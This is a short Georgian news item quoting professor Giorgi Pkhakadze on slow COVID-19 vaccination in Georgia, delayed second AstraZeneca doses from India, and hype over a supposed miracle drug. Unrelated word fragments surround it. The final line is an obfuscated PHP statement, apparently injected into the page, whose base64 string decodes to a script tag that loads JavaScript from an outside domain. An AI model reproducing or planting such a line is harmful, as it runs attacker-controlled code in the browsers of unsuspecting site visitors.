celsiusi
ავერსი საქკაბელი
პროფესორის, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელის, გიორგი ფხაკაძის განცხადებით, საქართველოში ვაქცინაცია პრაქტიკულად არ მიმდინარეობს. ის რამდენიმე ათასი დოზა არაფერს ნიშნავს. ამასთან მიდივე თქმით პრობლემაა „ასტრაზენეკას“ მეორე დოზასთან დაკავშირებით. 
 
“ვაფრთხილებდი, „ასტრაზენეკას“ პარტია ორ ნაწილად გაეყოთ, იმიტომ, რომ შეიძლება. მეორე დოზისთვის ვეღარ ჩამოეტანათ. ასეც მოხდა. მეორე პარტია ინდოეთიდან უნდა ჩამოსულიყო, მაგრამ ახლა თვითონ სჭირდებათ და ვერ მოგვცემენ. ნულია შანსი, რომ ,,ასტრაზენეკას” მეორე დოზა თავის დროზე ჩამოვიდეს საქართველოში.”- განაცხადა ფხაკაძემ.
 
პროფესორი ასევე გამოეხმაურა თემას, რომელიც ეხება კოვიდ 19 ის საწინააღმდეგო მედიკამენტის გამოგონებას.
 
 
“მინდა, გამოვეხმაურო კორონავირუსის საწინააღმდეგო ვითომდა მაგიურ წამალზე ატეხილ აჟიოტაჟსაც. მესამე სტადიის კვლევები დადონ და შემდეგ ვილაპარაკოთ. მაგიური მედიკამენტი არ გვექნება. იქნება რამდენიმე წამალი, ზოგი მეტად კარგი, ზოგი _ ნაკლებად, მაგრამ ის, რომ დავლევ და კოვიდი არ დამემართება, ეს არის ზღაპარი.
 
სექტემბერამდე ამერიკა და ევროპა თავიანთ ქვეყნებში პანდემიას რქებს მოუგრეხენ ამის შემდეგ ევროპა ალბათ  მიხედავს ახლო აღმოსავლეთს, მათ შორის _ საქართველოსაც.”
 
 
4152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");